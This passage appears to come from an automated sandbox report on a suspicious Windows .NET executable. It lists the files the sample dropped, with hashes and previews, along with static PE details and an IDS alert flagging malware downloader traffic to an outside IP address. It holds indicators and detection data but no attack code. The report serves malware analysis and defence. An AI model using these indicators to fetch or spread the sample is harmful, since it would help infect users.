Preview:	<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="678468" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409

C:\ProgramData\Microsoft\Windows\WER\Temp\WER9203.tmp.dmp

Download File

Process:	C:\Windows\System32\WerFault.exe
File Type:	Mini DuMP crash report, 16 streams, Thu Jan 16 12:44:36 2025, 0x1205a4 type
Category:	dropped
Size (bytes):	1088185
Entropy (8bit):	2.16142375532791
Encrypted:	false
SSDEEP:	6144:fnxmz4sLaycIKhNYaaceHJ+lcujxOVN9e1IqtmT3Qb:fn2olThNeL4yu1O/9nqtGQb
MD5:	EC020C8E9DA1EA94A1E786C526EA82E0
SHA1:	AEFCF149810B89AB508CA6551922FB312D8D8FC5
SHA-256:	C6ECB7D8A767F24E6ADC84DFD1446A7C4EDF00351B03943D31FFF9319E6B7B68
SHA-512:	35794E5F2CE5DF43EBFED57E44FA26343A60A660D0874A0FD538503EDA6F41A5CBAE47D06116F828C15948F56E86058B3591B72FC8DDF5012A3C5EE1E858F66D
Malicious:	false
Preview:	MDMP..a..... .......4..g............D............-..d............9......@....<.......i..............l.......8...........T...........xt..A&...........N...........P..............................................................................eJ......hQ......Lw......................T..............g.............................0..............,...E.a.s.t.e.r.n. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................E.a.s.t.e.r.n. .S.u.m.m.e.r. .T.i.m.e...............................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6...........................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\Microsoft\Windows\WER\Temp\WER94C3.tmp.WERInternalMetadata.xml

Download File

Process:	C:\Windows\System32\WerFault.exe
File Type:	XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category:	dropped
Size (bytes):	8874
Entropy (8bit):	3.7161736779194525
Encrypted:	false
SSDEEP:	192:R6l7wVeJiPFb6YEI1rxygmfqYpu2prt89bn6/fCNm:R6lXJaR6YEqrxygmfq+upnCfx
MD5:	67C18F173B45CEDAEAD1E6940D9E0831
SHA1:	7BB7D9C0C1E8452BAA817724378BBA4DADF5D5B5
SHA-256:	97CC2DFFDE3FD28B331D79225DF1355BDEA8D7B0E7DDA81DB80E07BF536863FC
SHA-512:	0F070F70403C73CD3B72C6EF182DF3BD7A87CE5E48B457E94B5EC921278B21F530D1FF4E9A028B69C7B3894F72B3E6925593843B7224C7B1BD44D5328CEEC3FD
Malicious:	false
Preview:	..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.5.8.9.2.<./.P.i.

C:\ProgramData\Microsoft\Windows\WER\Temp\WER94F3.tmp.xml

Download File

Process:	C:\Windows\System32\WerFault.exe
File Type:	XML 1.0 document, ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	4808
Entropy (8bit):	4.543380977304688
Encrypted:	false
SSDEEP:	96:uIjfII7mH7V2J/DmDNnqDN0HGDSO+DSbd:uIUYmH7k/iMpleO+eJ
MD5:	065DF91F34D33FAB959839CA5C9080B1
SHA1:	0450B5ADB1BDB0E03538C951B8550C1186E3D188
SHA-256:	9ADAD63151143DB6CC4C02203E77C488191C9517D9B543A68F2EF23691D7ED91
SHA-512:	12ABD6A6A99BB627532A3CC93E4831050D745E0EF5243C8CAA8CFD89CB6F05E3694AFC44D4AD87CC47DC95F29100B2010ACA27EE01E5FDD7A3FC82170582B5E0
Malicious:	false
Preview:	<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="678467" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409

C:\ProgramData\Microsoft\Windows\WER\Temp\WER9C25.tmp.dmp

Download File

Process:	C:\Windows\System32\WerFault.exe
File Type:	Mini DuMP crash report, 15 streams, Thu Jan 16 12:44:38 2025, 0x1205a4 type
Category:	dropped
Size (bytes):	162012
Entropy (8bit):	1.653616007267905
Encrypted:	false
SSDEEP:	384:JmwDTX5/OT0ABQGvLkcZGZhSfVY11iwZ/bZyu7iBf:JmwDTX5/OT00vY9SfVYnpG
MD5:	7EDD72FE0EDD4FC63144A6A425D6EC5F
SHA1:	CA4A9E4AC8A40576A12C30790989904BCDC85CA3
SHA-256:	2FA8B84724E874B4A5679248B7DCF37B397BCA45CDB5C8307F1F3ECABB360310
SHA-512:	AF7A4BDC5B2D51F8F7BAAF42507051C677184C58815DC7C40A2230745C104DDCF5370E4FA5F961F1600A0E774D3CBAEF93E1EAC6BB91EFC7F66797D93B70AED5
Malicious:	false
Preview:	MDMP..a..... .......6..g........................d...........$...,'..........Hb..........`.......8...........T............3..<E..........P'..........<)..............................................................................eJ.......)......Lw......................T.......x...4..g.............................0..............,...E.a.s.t.e.r.n. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................E.a.s.t.e.r.n. .S.u.m.m.e.r. .T.i.m.e...............................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.......................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\Microsoft\Windows\WER\Temp\WER9E39.tmp.WERInternalMetadata.xml

Download File

Process:	C:\Windows\System32\WerFault.exe
File Type:	XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category:	dropped
Size (bytes):	6630
Entropy (8bit):	3.7179688696006368
Encrypted:	false
SSDEEP:	96:RSIU6o7wVetbKN0YzvzQ8zMxSO5aM4UG89b/xrDjf7Nhm:R6l7wVeJKN0Y/xv2prG89bZrff7zm
MD5:	9EB107A88AD151F9841721964A2C28BD
SHA1:	C213921DE00DED329B951CCE064465C283E1ECA8
SHA-256:	E5EF6481A1142ED9D2D30FC2945B79F84EA4C76AF2F6F7AF3A146BBC9EBC6C85
SHA-512:	17AA432394C3B60597F74F4AA04DB0C183BCBF7357B5B9C93926F875E4E937E0E9233336B87245CDC20FE5DA924A63EA4D8F5292E692F0F432C493A2456C742B
Malicious:	false
Preview:	..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.5.7.5.2.<./.P.i.

C:\ProgramData\Microsoft\Windows\WER\Temp\WER9EB7.tmp.xml

Download File

Process:	C:\Windows\System32\WerFault.exe
File Type:	XML 1.0 document, ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	4876
Entropy (8bit):	4.484982055891441
Encrypted:	false
SSDEEP:	48:cvIwWl8zs6Jg771I9kCw5WpW8VYvvYm8M4Jd1jFZPyq8vo1AROhy7+3Sh9d:uIjfII7mH7V3JdZWoiOhy7+ih9d
MD5:	4A35AC30CCB44894C1EE739A900BE540
SHA1:	3157D1D1BCD29EE815639FB62AE2F7436F4C7216
SHA-256:	1177C742F18CF17E12311D0E06B9E996F3FB40C5759768B85D18FC3BA62482A9
SHA-512:	9E5E0F3AF62B781B29749417306ECD4E9A525E9867791D522C8DA1AFB2690ABD80DB5FC6C5B5C37C95FC84D1D0E2D34CB469DB68419BF992306EC46A4E415A6B
Malicious:	false
Preview:	<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="678467" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409

C:\ProgramData\sys.key

Download File

Process:	C:\Program Files\Weekplus\GamePlusPlus.exe
File Type:	data
Category:	modified
Size (bytes):	85022
Entropy (8bit):	3.6793817721544344
Encrypted:	false
SSDEEP:	96:BuFD33333333CCCCCCCCCChhhhhhhhhhEEEEEEEEE999999999wwwwwwwwwwqgqz:S0xxxxxxxuJJJJ2qqqqqqqqa
MD5:	98FD78CFAE908EF4F87C784F1E0BBE01
SHA1:	3A646DACA5639CAB3636C123499CD434A884D66E
SHA-256:	76CAE3B4241B2B743FE73BB39B95238FB3DA64A2714D643ECD0869B9B77ED7D2
SHA-512:	67742DA7AB581BD900A96902784F81374F89601F83E4F26E53B3A72098EC7F07FDC4AFF178137872A6F94877763C4652D7EBFBE0562495E144D885C2C37FC8CD
Malicious:	false
Preview:	....[..h..:.].P.r.o.g.r.a.m. .M.a.n.a.g.e.r.....[..e..:.].2.0.2.5.-.1.-.1.6. . .7.:.4.4.:.3.7.....[..Q.[:.].....[..h..:.].P.r.o.g.r.a.m. .M.a.n.a.g.e.r.....[..e..:.].2.0.2.5.-.1.-.1.6. . .7.:.4.4.:.5.6.....[..Q.[:.].....[..h..:.].P.r.o.g.r.a.m. .M.a.n.a.g.e.r.....[..e..:.].2.0.2.5.-.1.-.1.6. . .7.:.4.4.:.5.6.....[..Q.[:.].....[..h..:.].P.r.o.g.r.a.m. .M.a.n.a.g.e.r.....[..e..:.].2.0.2.5.-.1.-.1.6. . .7.:.4.4.:.5.6.....[..Q.[:.].....[..h..:.].P.r.o.g.r.a.m. .M.a.n.a.g.e.r.....[..e..:.].2.0.2.5.-.1.-.1.6. . .7.:.4.4.:.5.6.....[..Q.[:.].....[..h..:.].P.r.o.g.r.a.m. .M.a.n.a.g.e.r.....[..e..:.].2.0.2.5.-.1.-.1.6. . .7.:.4.4.:.5.6.....[..Q.[:.].....[..h..:.].P.r.o.g.r.a.m. .M.a.n.a.g.e.r.....[..e..:.].2.0.2.5.-.1.-.1.6. . .7.:.4.4.:.5.6.....[..Q.[:.].....[..h..:.].P.r.o.g.r.a.m. .M.a.n.a.g.e.r.....[..e..:.].2.0.2.5.-.1.-.1.6. . .7.:.4.4.:.5.6.....[..Q.[:.].....[..h..:.].P.r.o.g.r.a.m. .M.a.n.a.g.e.r.....[..e..:.].2.0.2.5.-.1.-.1.6. . .7.:.4.4.:.5.6.....[..Q.[:.].....[..h..:.].P.r.o.g.r.a.m.

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\APP.exe.log

Download File

Process:	C:\Program Files\Weekplus\APP.exe
File Type:	CSV text
Category:	modified
Size (bytes):	4323
Entropy (8bit):	5.357603975270794
Encrypted:	false
SSDEEP:	96:iqbYqGSI6ozajtIzQ0cxYsAmSvBjwQYrKxmDRtzHeqKkCq10tpDuqDqWiNLyUII:iqbYqGcRIzQ0JyZtzHeqKkCq10tpDuqO
MD5:	08033DD1B6AF9F568AD463F0FC221C26
SHA1:	E2E28C4EF889C389013E3FBA70C699C0A84CD6A7
SHA-256:	54A73B6F54ADEB20602D83D810EEF5BD287E24631B3B7C9100F2408A17E4BA9A
SHA-512:	985B4EEE182DAE5C3761A4AA2702C3006F84C3F901F9FA30FB391E2A35D2C118ED2FCDF9C9022B9DB675D6D129E6F000658E8E892D0AB56923DFF1D761B91158
Malicious:	false
Preview:	1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\b187b7f31cee3e87b56c8edca55324e0\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Core\31326613607f69254f3284ec964796c8\System.Core.ni.dll",0..3,"System.Management.Automation, Version=3.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\27947b366dfb4feddb2be787d72ca90d\System.Management.Automation.ni.dll",0..3,"Microsoft.PowerShell.Commands.Diagnostics, Version=3.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35","C:\Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.P1706cafe#\37a5ed6e6a6a48d370ee34b13c3e2b37\Microsoft.PowerShell.Commands.Diagnostics.ni.dll",0..3,"System.Configuration.Install, Version=4.0.0.0, Culture=neutral

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_0z2nopvl.nk3.ps1

Download File

Process:	C:\Users\user\Desktop\#U6c47#U8054#U652f#U4ed8.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_1eri5ldb.xdh.psm1

Download File

Process:	C:\Program Files\Weekplus\APP.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_1lbehx4p.czs.ps1

Download File

Process:	C:\Program Files\Weekplus\APP.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_54i4xmek.hpj.ps1

Download File

Process:	C:\Program Files\Weekplus\APP.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_asrpzqat.zj0.psm1

Download File

Process:	C:\Users\user\Desktop\#U6c47#U8054#U652f#U4ed8.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_dqvjs42j.4kg.ps1

Download File

Process:	C:\Users\user\Desktop\#U6c47#U8054#U652f#U4ed8.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_dw4jzgdm.gqm.psm1

Download File

Process:	C:\Users\user\Desktop\#U6c47#U8054#U652f#U4ed8.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_qvrzap2u.355.psm1

Download File

Process:	C:\Program Files\Weekplus\APP.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Windows\appcompat\Programs\Amcache.hve

Download File

Process:	C:\Windows\System32\WerFault.exe
File Type:	MS Windows registry file, NT/2000 or above
Category:	dropped
Size (bytes):	1835008
Entropy (8bit):	4.424973271799568
Encrypted:	false
SSDEEP:	6144:7Svfpi6ceLP/9skLmb0OTGWSPHaJG8nAgeMZMMhA2fX4WABlEnNC0uhiTw:mvloTGW+EZMM6DFyM03w
MD5:	AC0723D6F98CD03FDE8E0BB517631075
SHA1:	BEB0C181FB1509E953AA1AB97FE47D7EC48064F2
SHA-256:	36C56ABEDA19966A792451B0F97CCD016BA052E896FA4768B34E3A5BF9E3FA63
SHA-512:	17EBA47583C33D9F97591A78171C0A711167373180449AA2A25B90928F53C29583870E98D6C063EB8A0FA3213D67A16228B1AEBD9181B2AA105F9DE65C680F79
Malicious:	false
Preview:	regf@...@....\.Z.................... ...........\.A.p.p.C.o.m.p.a.t.\.P.r.o.g.r.a.m.s.\.A.m.c.a.c.h.e...h.v.e....c...b...#.......c...b...#...........c...b...#......rmtm.[.e.h.................................................................................................................................................................................................................................................................................................................................................Q........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

Static File Info

General

File type:	PE32+ executable (GUI) x86-64 Mono/.Net assembly, for MS Windows
Entropy (8bit):	7.997342205642334
TrID:	Win64 Executable GUI Net Framework (217006/5) 49.88% Win64 Executable GUI (202006/5) 46.43% Win64 Executable (generic) (12005/4) 2.76% Generic Win/DOS Executable (2004/3) 0.46% DOS Executable Generic (2002/1) 0.46%
File name:	#U6c47#U8054#U652f#U4ed8.exe
File size:	23'566'848 bytes
MD5:	eabc234727934ad76f332e7cfb28c80b
SHA1:	c89d84a40075a2c53da3be5eb17e3fd95d6b7cc8
SHA256:	5e1d7275b0abd484c15f186690db73c42e861311da3f5f048563636336933b4a
SHA512:	2e95938c113543483b53517304a8494411b07174a2f349d89f7a376108ae8f0ac92d990adad1ac34e5a9eba007beb7d5d5c89f5e6dbc764b360aa2966ce9d3ac
SSDEEP:	393216:m24IY5EzejkCerI8v6sN4hd79bb/wwDkbHdj3LHvFN0eW/Lw4e:m5Ib2kCe0e67jZJwHh3LPFN7
TLSH:	353733B82082C178529EDA5899117E3CD493FE15BF6FBE9C20AC75EF5072353822563B
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d...7..g.........."......Xg..@........... .....@..... ........................g...........@...@......@............... .....

File Icon


Icon Hash:	cc17332d29339ee0

Static PE Info

General

Entrypoint:	0x140000000
Entrypoint Section:
Digitally signed:	false
Imagebase:	0x140000000
Subsystem:	windows gui
Image File Characteristics:	EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE
DLL Characteristics:	DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Time Stamp:	0x67831B37 [Sun Jan 12 01:30:31 2025 UTC]
TLS Callbacks:
CLR (.Net) Version:	v4.0.30319
OS Version Major:	4
OS Version Minor:	0
File Version Major:	4
File Version Minor:	0
Subsystem Version Major:	4
Subsystem Version Minor:	0
Import Hash:

Entrypoint Preview

Instruction
dec ebp
pop edx
nop
add byte ptr [ebx], al
add byte ptr [eax], al
add byte ptr [eax+eax], al
add byte ptr [eax], al

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x1678000	0x3f88	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x0	0x0
IMAGE_DIRECTORY_ENTRY_DEBUG	0x167773c	0x1c	.text
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x2000	0x48	.text
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x2000	0x16757d6	0x1675800	7391d0a8df6be6683c546d9408378b0e	unknown	unknown	unknown	unknown	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rsrc	0x1678000	0x3f88	0x4000	f3e91f10f5d04f1af9b9c5faedf430d6	False	0.4716796875	data	5.161049875986901	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	ZLIB Complexity
RT_ICON	0x16783d0	0x3228	Device independent bitmap graphic, 64 x 128 x 24, image size 0, resolution 3780 x 3780 px/m	0.4749221183800623
RT_GROUP_ICON	0x167b5f8	0x14	data	1.25
RT_VERSION	0x1678130	0x2a0	data	0.44642857142857145
RT_MANIFEST	0x167b610	0x978	XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators	0.44636963696369636

Network Behavior

Suricata IDS Alerts

Timestamp	SID	Signature	Severity	Source IP	Source Port	Dest IP	Dest Port	Protocol
2025-01-16T13:44:16.653417+0100	2803305	ETPRO MALWARE Common Downloader Header Pattern H	3	192.168.2.5	49707	183.66.100.51	443	TCP
